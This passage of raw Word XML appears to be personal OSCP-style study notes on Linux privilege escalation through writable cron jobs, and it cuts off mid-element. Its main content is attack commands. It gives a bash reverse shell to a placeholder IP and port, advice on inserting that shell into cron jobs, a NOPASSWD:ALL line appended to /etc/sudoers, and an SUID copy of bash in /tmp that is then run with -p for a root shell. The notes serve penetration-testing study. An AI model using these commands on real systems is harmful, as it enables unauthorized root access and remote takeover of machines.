    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x file.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wait for cron job</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then run /tmp/rootbash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/rootbash –p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can also do a reverse shell payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023CD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pdsm8fnk1tlx" w:id="319"/>
      <w:bookmarkEnd w:id="319"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron Job Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash Reverse Shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you see a cron job and want to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">insert a Bash reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, try just adding the Bash shell into like the first or last line of the cron job instead of deleting the cron job. And if that doesn't work, then delete the code inside of the cron job and just put the Bash shell. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is an example of a Bash Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;your-ip&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;port&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i → runs it in interactive mode so it behaves like a normal shell (reads from stdin, prints prompts, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running a file as sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever see a cron job that allows you to run a file as sudo, and you can edit or add a file, then create a file that simply says "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then once you run that file as sudo, it will open a root shell for you</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '/bin/sh' &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1040"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 allows read/write/execute permissions for ALL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023DF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Give Sudo Privileges to current user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can give all sudo privilege to your current user:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="324"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'echo " </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">michael </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ALL=(ALL) NOPASSWD:ALL" &gt;&gt; /etc/sudoers' &gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cleanup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1207"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">michael</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with the username of your current user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1207"/>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cleanup.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your desired name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1207"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Result: Once the cron job executes cleanup.sh as root, your user gains passwordless root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make an SUID copy of /bin/bash </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can make a copy of /bin/bash and set the SUID bit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1294"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1294"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /bin/bash /tmp/rootbash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1294"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +s /tmp/rootbash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023EB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to be extra safe, find the full path to cp and chmod incase PATH variable is broken</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then to execute it, run this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="754"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/rootbash -p </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="754"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "-p" is specific to /bin/bash and tells it to make sure to run bash with the SUID bit and not as our current user permissions </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make a root copy of /bin/bash in one line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-C .157</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="977"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, find the path to chmod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F3">
      <w:pPr>
        <w:numPr>
